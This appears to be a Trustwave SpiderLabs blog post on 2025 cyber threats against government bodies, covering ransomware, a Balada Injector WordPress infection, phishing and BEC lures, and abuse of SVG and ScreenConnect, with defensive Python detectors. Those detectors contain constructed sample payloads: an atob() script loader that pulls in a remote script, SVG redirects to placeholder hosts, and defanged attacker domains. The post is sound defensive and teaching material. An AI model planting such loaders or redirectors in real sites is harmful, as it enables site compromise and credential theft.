
Bolstering Cybersecurity Resilience in the Public Sector

With digital transformation continuing unabated, the prevalence of legacy systems, and the rising interconnectedness of complex systems and services, organizations in the public sector face a plethora of challenges and cyber risks.

In this article, part of a series of public sector blog posts that tackle ransomware trends and dark web research pertaining to government entities, the Trustwave SpiderLabs team shines a spotlight on the various threats and risks affecting government organizations. This serves as an update to our 2024 Public Sector Threat Briefing.

This report covers the reasons why threat actors continue to target the public sector and provides insight into why the public sector is an attractive cybercriminal target. In addition, we provide several notable cybercriminal trends and threats we’ve observed in the first half of 2025, including malware attacks, phishing emails, and platform abuse.

 

Public Sector Attacks: A Brief Overview

In the past year, cyber threats targeting public administrations have intensified. Ransomware and extortion attacks continued to rise sharply, with over 117 US Federal and State government entities affected in 2024 alone. Ransomware-as-a-Service (RaaS) groups expanded operations, often targeting third-party providers and leveraging new tactics such as data extortion without encryption.

Figure 1. Switzerland's public administration is believed to have become a victim of a ransomware attack.

The MOVEit and GoAnywhere breaches demonstrated the long-lasting impact of supply chain vulnerabilities, as sensitive data from government-linked organizations continued to surface. AI tools are now being used by attackers to craft more convincing phishing campaigns and evade detection, while deepfakes and voice impersonation have added a new layer of social engineering risk. Meanwhile, only a minority of public agencies currently assess the security of AI tools before adoption.

Figure 2. A governmental agency is suspected of being a victim of the latest SharePoint exploit usage.

New zero-day vulnerabilities, such as the 2025 Microsoft SharePoint and Citrix Bleed flaws, were exploited rapidly by state-linked groups, highlighting the shrinking time between disclosure and exploitation. The SharePoint campaign alone impacted multiple US federal agencies, underlining the urgency of faster vulnerability management.

While state-sponsored campaigns by China, Russia, and North Korea remained active, governments launched major initiatives: the US introduced its National Cybersecurity Strategy, the EU launched a joint cyber response unit, and NATO advanced its rapid cyber defense capabilities.

 

The Public Sector Attacks: Motivations and Value for Threat Actors

The public sector offers a rich and multifaceted target for cybercriminals, hacktivists, and nation-state actors alike. Unlike purely commercial sectors, public administrations manage an extensive mix of sensitive personal, operational, and strategic data, making them particularly attractive for various types of exploitation. Across nearly all divisions, attackers may pursue:

Figure 3. A threat actor introduces data obtained from governmental sources.

  • Personally Identifiable Information (PII): Public agencies often maintain massive databases of residents and citizens, including names, addresses, Social Security numbers (SSNs), tax records, health data, and more. Threat actors can then sell this data on the dark web, use it in fraud, or weaponize it in disinformation campaigns.

Figure 4. A threat actor offers data obtained from a claimed breach of the NY state website.

  • Operational Disruption: Government agencies deliver essential services, from emergency response to water treatment to social aid. Disrupting these services via ransomware or distributed denial-of-service (DDoS) attacks not only garners ransom payments but also creates public fear and political pressure, particularly effective for ideologically or state-backed actors.
  • Espionage and Surveillance: State-sponsored actors often seek access to internal communications, policy documents, or diplomatic files. Breaches can offer long-term insight into national strategies or decision-making processes.
  • Credential and Infrastructure Access: Many public entities use legacy systems or third-party vendors, making them vulnerable to initial compromise and lateral movement into more sensitive networks. Compromised access may be sold or used to stage deeper attacks.
  • Monetary Gain via Ransomware: With limited budgets and public accountability, public institutions are often underprepared for ransomware attacks. This makes them lucrative and less defended than private-sector firms of similar size.
  • Political and Social Manipulation: Targeting public-facing systems, such as election infrastructure or public health databases, allows attackers to undermine trust in institutions and spread chaos.

Figure 5. A threat actor is advertising data claimed to have been obtained from a breach of the Dubai Municipality.

Each governmental branch handles distinct data types, system access levels, and operational roles, enabling attackers to customize their tactics and goals to exploit these specific characteristics.

Table 1.

The public sector is attacked not only for data or money but also for influence, intelligence, and leverage.

Figure 6. A threat actor leaks private files from the Argentinian police.

Each sub-division offers unique value to adversaries depending on their motivations, whether financial, political, or strategic.

Figure 7. A dark web forum advertisement offers the stolen data of 4.2 million people from Romania.

The diversity of services, systemic interconnectivity, and often underfunded cybersecurity teams make the public sector one of the most critical areas when it comes to defense and attacker interest.

 

Notable Trends in the Public Sector

From Trustwave’s global perspective, we’ve picked a few noteworthy trends that may be going under the radar for your security team.

 

Malware Attack on a Local Government Council

The Threat: In November 2024, we received a case from a local government council whose website had been injected with code linked to the Balada Injector campaign, a widespread threat known for targeting WordPress websites through cross-site scripting (XSS) vulnerabilities.

The infection was traced to the exploitation of a known XSS vulnerability within the Popup Builder plugin, a popular tool used on WordPress platforms. The attackers manipulated a custom event to inject JavaScript code during pop-up triggers.

The injected code contained Base64-encoded strings that, when decoded, revealed a callback URL (https://call[.]colorschemeas[.]com/2YYHm4). The script contacted this external server to download further malicious payloads and ultimately install a PHP-based backdoor. 

Figure 8. Balada Injector’s malicious obfuscated code injected into a website. The script contacts an external server and downloads additional malware.

Mitigations to Reduce Risk: Threat actors can use XSS attacks to trigger all sorts of actions on the victim system. To address this threat, public sector organizations must keep their CMS and webpage frameworks up-to-date. They should also remove unnecessary and unsupported products and services from the website. 
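A practical complement to patching is to check what the site is actually serving. The script below is an added example, not code from the council case or from Trustwave: it walks the inline scripts of a page, decodes any Base64 run that turns out to be an http(s) URL (the technique the injected loader used to hide its callback), and flags hosts that are not on the site's own allow-list. The page, the `council.example` host and the `callback.example.invalid` URL are constructed placeholders, not the indicator from the case.

```python
import base64
import re
from urllib.parse import urlparse

# Placeholder second-stage URL (constructed for this example; not the
# indicator from the council case).
CALLBACK_URL = "https://callback.example.invalid/stage2"
_B64_CALLBACK = base64.b64encode(CALLBACK_URL.encode()).decode()

# Constructed page: one benign inline script and one injected loader that
# hides its download URL behind atob(), as the injected code above did.
SAMPLE_HTML = f"""<html><body>
<script>document.getElementById('banner').textContent = 'Council notices';</script>
<script>var u=atob('{_B64_CALLBACK}');var s=document.createElement('script');s.src=u;document.head.appendChild(s);</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# Runs of the Base64 alphabet long enough to hold a URL; short identifiers
# such as getElementById never reach the 16-character floor.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_urls(text):
    """Return every Base64 run in `text` that decodes to an http(s) URL."""
    urls = []
    for candidate in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            # Not valid Base64, or not text: an identifier, not a hidden URL.
            continue
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def find_hidden_callbacks(html, own_hosts):
    """Scan inline scripts and report decoded URLs, marking hosts outside own_hosts."""
    findings = []
    for index, script in enumerate(SCRIPT_RE.findall(html)):
        for url in decode_b64_urls(script):
            host = (urlparse(url).hostname or "").lower()
            findings.append({
                "script_index": index,
                "url": url,
                "host": host,
                "external": host not in own_hosts,
            })
    return findings


if __name__ == "__main__":
    for hit in find_hidden_callbacks(SAMPLE_HTML, {"council.example"}):
        flag = "EXTERNAL" if hit["external"] else "internal"
        print(f"script #{hit['script_index']}: {flag} callback -> {hit['url']}")
```

Run it against a saved copy of the home page and of any page that renders plugin output (pop-ups included); a decoded URL on a host the organization does not own is worth an immediate look, and the same scan makes a cheap scheduled integrity check once the CMS and plugins are patched.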


Callback Phishing-BEC Targeting the City’s Finance Department

The Threat: Callback phishing, also known as telephone-oriented attack delivery (TOAD), is a type of phishing attack where attackers trick targets into calling their contact phone number enclosed in the email. In 2024, SpiderLabs saw a 140% increase in the number of TOAD attacks. Recently, this technique has also been seen in several business email compromise (BEC) campaigns.

In the example below, spammers impersonated the finance employee of a local civil engineering company that works on government infrastructure projects. The attackers claimed to have changed their email address and phone number and requested some financial documents. The sender domain was newly created (it was made this year) and isn’t owned by the engineering company. The specified phone number isn’t listed on the company’s official website. The fraudsters were aiming to divert the victim to their fraudulent communication channels and eventually divert funds to their account, too.

Figure 9. BEC scam requesting a contact update, featuring a fraudulent phone number and email address.

Mitigations to Reduce Risk: To thwart callback phishing attacks, organizations in the public sector should have multilayered email security solutions and train employees to spot and report phishing emails.

Organizations should inform employees to be wary of unsolicited emails, even those sent from legitimate platforms. When employees receive emails that urge users to call a phone number immediately, they should be taught to instead look up the company’s contact information listed on its official website. Employees who decide to contact hotline numbers should also be warned about sharing sensitive or financial information over the phone.

 

Compromised Government Email Account Sends Out Phishing Emails

The Threat: An attacker used the compromised email account of a top-level government employee to deliver phishing emails. The messages claimed that the recipient had to review a document related to a government project by clicking the link in the message. Paired with the authority of the compromised email account, the phishing attack was very compelling.

The messages examined by SpiderLabs contained a link pointing to a malicious page hosted on either the Craft platform or Google Presentations. These intermediary pages embed either the actual phishing link or an additional redirector to further obscure the final destination.

Figure 10. A sample of an email with a Craft phishing link sent from a compromised government council address, requesting the recipient to review a supposed project document.

Figure 11. The threat actor’s reply to a recipient’s inquiry about the legitimacy of an earlier message, which contained a malicious Google Presentations link.

The redirector webpage hosted on the Craft platform matched the theme of the phishing email. The compromised email account owner’s name was used as the creator of the page, and a link to the supposed document for review was embedded on the page.

Figure 12. A Craft.me landing page accessed via the email link, displaying a fake Excel document image with an embedded phishing link.

The next-stage URL leads to a fake DocuSign site hosted on an open directory megarack[.]com. Once the user enters their email address and clicks on “VERIFY YOUR EMAIL,” they will be redirected to a Microsoft phishing page hosted on a newly registered domain. 

Figure 13. Phishing landing page impersonating DocuSign, prompting victims to enter an email address and then redirecting to a fake Microsoft login portal.

 

Compromised Indiana Government GovDelivery Accounts used in TxTag ‘Toll Charges’ Phishing Campaign

In May 2025, threat actors launched a phishing campaign impersonating TxTag, Texas’s electronic toll collection system, by sending emails claiming toll charges. The messages originated from compromised Indiana government accounts, including the Indiana Department of Local Government Finance, and were distributed through the GovDelivery platform.

Below is the phishing email that was sent and here is a link to the May 13, 2025, SpiderLabs post on X that discusses the incident.

Figure 14. A phishing email impersonating TxTag sent via the compromised GovDelivery account of the Indiana Department of Local Government Finance (DLGF).

Recipients were directed to newly registered look-alike domains hosting a fake TxTag page designed to harvest personal information, credit card data, and one-time passwords (OTPs). 

Mitigations to Reduce Risk: Account compromise can lead to identity theft, operational disruption, and financial loss, and it gives attackers a trusted channel for malware distribution and the launch of further cyberattacks.

If you notice any peculiar signs that point to your email account being compromised, such as being logged off from all your devices, receiving password reset notifications that you did not initiate, and seeing emails you don’t recognize appearing in your sent and deleted folders, immediately alert your company’s IT or Incident Response department. 

 

Phishing Campaigns Impersonating Transport, Traffic, and Social Security Administration Authorities 

The Threat: Phishing emails purporting to be from transport agencies use lures specific to that sector, such as driver’s license renewal, vehicle registration renewal, overdue toll fees, or traffic violation fines, to obtain sensitive and/or financial information. Scammers usually persuade a victim to act upon their email immediately to avoid paying an increased payment amount or penalty fee.

SpiderLabs also uncovered another impersonation campaign involving a phishing email purporting to be from NZTA, one of New Zealand’s transportation governing bodies. The agency’s name is used in the From header; however, the sender’s email address is not related to the government agency.

Figure 15. A fake vehicle registration renewal notice impersonating NZTA that includes a phishing link hosted on a compromised website.

The message mimics NZTA’s official vehicle renewal email notification. When victims click the “RENEW REGISTRATION NOW” button, they are redirected to a fake NZTA page hosted on a compromised site not associated with the New Zealand government. This fake page, in turn, is just a stager that automatically redirects to another site.

Figure 16. The sequence of phishing landing pages mimicking TxTag, designed to steal personal and credit card information.

The email below was crafted to resemble an email alert from NaTIS, a South African government traffic information platform. The platform’s name and logo were used on the sender’s email address and message body, respectively.

Figure 17. Phishing email posing as a NaTIS traffic fine notification that contains a malicious link.

A traffic violation theme was used to entice the user to click the phishing link. The fake email claimed the recipient owes a traffic fine, which must be resolved immediately or the fine will be increased. Clicking the “Complete the update” button in the email leads the user to a site unrelated to NaTIS. The domain fixeguro[.]pt hosts an open directory that was left publicly accessible and was therefore abused by threat actors.

Social Security Administration Impersonation: SSA is a US government agency that administers social programs and is one of the public sector entities that has been actively impersonated in phishing campaigns since 2024.

SVG Redirector Disguised as SSA Document: SpiderLabs reported that attacks using SVG image files have surged significantly in the first quarter of 2025. This has been reported in one of Trustwave SpiderLabs’ blogs, “Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks.”

The attachment on the email below, masked as an SSA benefit statement (SSA-1099), is a small SVG file containing redirection code. When the SVG file is opened, the user is led to a webpage unrelated to the SSA. The webpage was already inaccessible at the time this campaign was examined.

Figure 18. A phishing email impersonating the SSA that includes a lure for a tax document review. The malicious email contains a malicious SVG attachment that redirects to a phishing site when opened.
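An SVG "document" that exists only to redirect has almost nothing in common with a real image, which makes it easy to triage at the mail gateway. The inspector below is an added example, not Trustwave's detection logic: it parses the attachment, records active content (script-bearing elements, `on*` event handlers, `javascript:` hrefs) and extracts any `location`-style redirect target from the raw text, so an SVG that merely draws shapes passes while a redirector is flagged with its destination. The three sample files and the `phish.example.invalid` URLs are constructed placeholders, not indicators from the SSA campaign.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: a harmless icon, an SVG that redirects from its onload
# handler, and one that redirects from an embedded <script>. The URLs are
# placeholders, not indicators from the campaign.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><rect width="16" height="16" fill="#1a4"/></svg>'
ONLOAD_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="window.location.href='https://phish.example.invalid/ssa'">
<text x="2" y="14">SSA-1099</text></svg>"""
SCRIPT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"><script>
window.location.replace("https://phish.example.invalid/doc");</script></svg>"""

# Elements that let an image carry executable or foreign content.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Common navigation idioms; the capture group is the destination URL.
REDIRECT_RE = re.compile(
    r"""(?:location(?:\.href)?\s*=\s*|location\.(?:replace|assign)\(\s*|window\.open\(\s*)['"]([^'"]+)['"]"""
)


def _local(name):
    """Drop an XML namespace prefix such as {http://www.w3.org/1999/xlink}."""
    return name.rsplit("}", 1)[-1].lower()


def inspect_svg(data):
    """Return active-content findings and redirect targets for one SVG attachment."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # A malformed file is not a usable image either; treat it as suspect.
        findings.append(f"unparseable:{exc}")
        root = None
    if root is not None:
        for el in root.iter():
            tag = _local(el.tag)
            if tag in ACTIVE_ELEMENTS:
                findings.append(f"element:{tag}")
            for attr, value in el.attrib.items():
                name = _local(attr)
                if name.startswith("on"):
                    findings.append(f"event-handler:{name}")
                elif name == "href" and value.strip().lower().startswith("javascript:"):
                    findings.append("javascript-href")
    # Regex over the raw bytes catches redirects whether they sit in a script
    # body or inside an attribute value.
    targets = REDIRECT_RE.findall(data.decode("utf-8", "replace"))
    return {
        "findings": findings,
        "targets": targets,
        "suspicious": bool(findings or targets),
    }


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("onload", ONLOAD_SVG), ("script", SCRIPT_SVG)):
        result = inspect_svg(blob)
        print(label, "SUSPICIOUS" if result["suspicious"] else "clean", result["findings"], result["targets"])
```

The check is deliberately strict: legitimate benefit statements are not delivered as SVG, so for a mail stream any SVG attachment with a finding can be quarantined outright, and the extracted target URL goes straight to the blocklist and to the hunt across proxy logs.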

Phishing Link Spreads Malicious Copy of ScreenConnect: In the SSA-themed phishing email below, the sender claimed the recipient’s most recent financial record might be erroneous and must be verified by installing the “Social Security Screen Connect” program onto the recipient’s system. Once the user clicks the link in the email, a malicious copy of the ScreenConnect tool is installed onto the system.

Figure 19. A phishing email impersonating the SSA instructs the recipient to download an SSA program to fix a reported statement error.

ScreenConnect is a remote desktop tool from ConnectWise that threat actors have actively leveraged since early 2024, as it is a convenient remote access tool to deliver through phishing emails.

The phishing link leads to a page hosted on Cloudflare’s platform pages[.]dev. This page just redirects to a fake SSA site hosted on the newly registered domain ssahelpcentral[.]com[.]ru, named after the government agency being spoofed. 

Before the malicious ScreenConnect file is downloaded, the user’s network information, such as IP address and country, is gathered using the service at https://ipapi[.]co and sent to the threat actors.

Figure 20. Fake SSA landing pages that lead users to download a malicious ScreenConnect executable.

Mitigations to Reduce Risk: Threat actors are always exploring new methods to push out phishing campaigns, including impersonation. In these cases, they are banking on the authority and legitimacy of public sector organizations to trick victims into clicking on malicious links and unwittingly disclosing their sensitive information.

To counter phishing emails sent via compromised accounts, organizations should conduct regular phishing awareness training and phishing simulation exercises, empowering employees to successfully spot and report phishing emails.
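The three signals that recur across the callback-phishing BEC case above and the transport and SSA lures (an agency name in the From display name on an unrelated domain, a phone number the recipient is told to call, and pressure to act immediately) are simple enough to score automatically before a message reaches a user. The triage routine below is an added example, not Trustwave's or any product's detection logic; it uses only the standard library's `email` parser. The agency-to-domain table, the three sample messages and their domains are constructed for the example and are not taken from the campaigns.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Agencies and the domains they legitimately send from. Constructed for this
# example; a real deployment would maintain this from verified sources.
KNOWN_SENDERS = {
    "nzta": {"nzta.govt.nz"},
    "social security administration": {"ssa.gov"},
    "ssa": {"ssa.gov"},
}
URGENCY_WORDS = ("immediately", "overdue", "penalty", "within 24 hours", "final notice")
CALL_CUES = ("call", "phone", "hotline")
PHONE_RE = re.compile(r"\(?\b\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")

# Constructed samples (no leading newline: the first line must be a header).
SPOOF_NZTA = """From: "NZTA Vehicle Licensing" <renewals@nz-registration-mailer.example>
To: resident@example.org
Subject: Vehicle registration overdue

Your vehicle registration is overdue. Renew immediately to avoid a penalty.
RENEW REGISTRATION NOW: https://renewal.example.invalid/nzta
"""
CALLBACK_BEC = """From: "Accounts Payable" <ap@newvendor-mail.example>
To: finance@city.example
Subject: Updated contact details

We have changed our phone number and email address. Please call (555) 010-4242
immediately and send the outstanding invoices and the new bank details.
"""
LEGIT_NZTA = """From: "NZTA" <noreply@nzta.govt.nz>
To: resident@example.org
Subject: Your registration statement

Your annual registration statement is available in your online account.
"""


def triage(raw_message):
    """Score one plain-text message and return the signals that fired."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    body = msg.get_payload().lower()
    signals = []

    # 1. Display name claims an agency, but the address is not on its domain.
    for agency, domains in KNOWN_SENDERS.items():
        if re.search(rf"\b{re.escape(agency)}\b", display.lower()) and domain not in domains:
            signals.append(f"display-name impersonates '{agency}' from {domain}")
            break

    # 2. Callback lure: a phone number next to an instruction to call it.
    phones = PHONE_RE.findall(body)
    if phones and any(cue in body for cue in CALL_CUES):
        signals.append(f"callback number in body: {phones[0]}")

    # 3. Pressure to act now, the common thread in the toll, fine and renewal lures.
    if any(word in body for word in URGENCY_WORDS):
        signals.append("urgency pressure")

    verdict = "review" if len(signals) >= 2 else ("watch" if signals else "clean")
    return {"from": addr, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    for label, raw in (("spoofed NZTA", SPOOF_NZTA), ("callback BEC", CALLBACK_BEC), ("legitimate", LEGIT_NZTA)):
        result = triage(raw)
        print(f"{label}: {result['verdict']} {result['signals']}")
```

A "review" verdict is a routing decision, not a block: it sends the message to the security team and tags it for the recipient, which is exactly the point at which the guidance above applies (look the organization up independently and never use the number in the message). The agency table is the part that needs care in production; keep it to domains you have verified, since a stale entry turns a real notice into a false positive.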

 

DocuSign Platform Abused in State of Nevada Procurement Phishing

The Threat: Threat actors are still exploiting an old favorite, the DocuSign platform, to deliver phishing emails and host malicious content. Phishing emails were sent from legitimate DocuSign servers, with embedded links directing users to DocuSign-hosted pages.

In one example, the phishing email impersonated the Nevada State procurement department, falsely referring to a “Procurement Service” to enhance the note’s credibility and deceive recipients. The email was sent via DocuSign, from the account which the threat actor controlled — adm[.]customerservice[.]cc[@]hotmail[.]com. A DocuSign envelope for sharing the malicious document was created — the document State of Nevada.pdf was uploaded with a Needs to View action. The target victims were added as the recipients of this fake government document. 

Figure 21. A “Review Document” phishing email delivered via DocuSign, impersonating the State of Nevada’s procurement office.

Once the “REVIEW DOCUMENT” button is clicked, the user is presented with a malicious document hosted on DocuSign. The document contains a Bing redirect link. The attack ultimately sent users to a credential-harvesting site that employs an adversary-in-the-middle (AITM) Tycoon2FA phishing kit, enabling the bypass of multi-factor authentication (MFA) mechanisms.

Figure 22. A genuine DocuSign page hosting a maliciously crafted document with a link that redirects to a phishing site through Bing.

Mitigations to Reduce Risk: To bypass email detection tools, threat actors abuse legitimate apps and services to distribute and host malicious payloads as well as redirect users to malicious pages and sites.

Public service organizations can benefit from multilayered email security platforms that effectively detect malicious URLs and attachments, hindering malicious emails from reaching users’ inboxes.

 

Conclusion

If the threats and risks we highlighted in this report are any indication, the public sector will continue to face increasingly complex and covert attacks. To keep the public sector secure, security professionals must adopt a multilayered approach to cybersecurity, implementing hardening standards, keeping their asset inventory up-to-date, and following applicable security recommendations. By doing so, public sector organizations can safeguard data privacy, business continuity, and public trust.
